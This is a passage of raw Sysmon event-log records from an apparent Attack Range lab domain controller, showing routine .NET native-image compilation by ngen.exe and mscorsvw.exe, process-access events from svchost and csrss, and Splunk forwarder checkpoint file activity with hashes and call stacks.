.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.412{4DB9351A-A111-60D3-6002-00000000CF01}7096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M3891CDO3Z\System.Device.ni.dll.auxMD5=931650146A6264DC138938B4E3D779AD,SHA256=3046C50E9EBE5BEF8F843FCBEFB229D5EB561E890114C52EB442B67D70CB4E1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.412{4DB9351A-A111-60D3-6002-00000000CF01}7096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M3891CDO3Z\System.Device.ni.dllMD5=0D4F1813E61D936C5381B2FB80324E4A,SHA256=8ADB33FAFE0738CF075429939409C98BB69A760F340207401161A7F1BAA34FB7,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:05.396{4DB9351A-A111-60D3-6002-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bb8-0\System.Device.dll2021-06-23 21:01:05.396 10341000x800000000000000018739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.255{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A111-60D3-6002-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.240{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A111-60D3-6002-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.240{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A111-60D3-6002-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.177{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A111-60D3-5F02-00000000CF01}1272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.162{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA008A97FD4757539672B12AF53956D3,SHA256=DA93F8572177ED4EAA7C0243E704766A76C5B04C0F2FCA3B0600477F746E2056,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.162{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A111-60D3-5F02-00000000CF01}1272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.162{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A111-60D3-5F02-00000000CF01}1272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.927{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A112-60D3-6502-00000000CF01}5972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.912{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A112-60D3-6502-00000000CF01}5972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.912{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A112-60D3-6502-00000000CF01}5972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000018759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:06.818{4DB9351A-A112-60D3-6402-00000000CF01}2612C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a34-0\System.DirectoryServices.Protocols.dll2021-06-23 21:01:06.818 10341000x800000000000000018758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.505{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A112-60D3-6402-00000000CF01}2612C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.490{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A112-60D3-6402-00000000CF01}2612C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.490{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A112-60D3-6402-00000000CF01}2612C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.458{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A112-60D3-6302-00000000CF01}7056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.443{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A112-60D3-6302-00000000CF01}7056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.443{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A112-60D3-6302-00000000CF01}7056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000018752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:06.334{4DB9351A-A111-60D3-6202-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1938-0\System.DirectoryServices.AccountManagement.dll2021-06-23 21:01:06.334 23542300x800000000000000018751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.193{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEA66E568C78539D1DCBA78CA1A52346,SHA256=5888D361A70356278123103898ECD862249390ABB703E4AE2249BF731CF9C6FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.193{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48454BAAD86B4A530261B08E34B69F92,SHA256=0366A2923568DA7305658EFD241FD8F856FA70CD7CA236F204EE68BB6CF06388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.193{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2AA6C477B8AA3CEABB9B47B2C92D7C28,SHA256=696909B6828627DACB90C6C3A8307D82B2C29BFA50311724B871DC4E9C4774CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.912{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6902-00000000CF01}7128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.896{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6902-00000000CF01}7128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.896{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6902-00000000CF01}7128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.849{4DB9351A-A113-60D3-6802-00000000CF01}7136NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I7LZTBZVX2\System.Dynamic.ni.dll.auxMD5=EE1BC091F8771CA0B35329CBAE54A5A2,SHA256=B681B6E8204DC1FE095A6E03FE0984BD1589052088CDB17ECADFCDE32343641B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.849{4DB9351A-A113-60D3-6802-00000000CF01}7136NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I7LZTBZVX2\System.Dynamic.ni.dllMD5=BB8DB5D69A750295C217A48CBDFB1AC3,SHA256=AC12CE15CD82AD1C5D614EE6E16495C3FD361188A9F49E2998A784E3EDC2F4AF,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:07.818{4DB9351A-A113-60D3-6802-00000000CF01}7136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1be0-0\System.Dynamic.dll2021-06-23 21:01:07.818 10341000x800000000000000018777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.568{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6802-00000000CF01}7136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 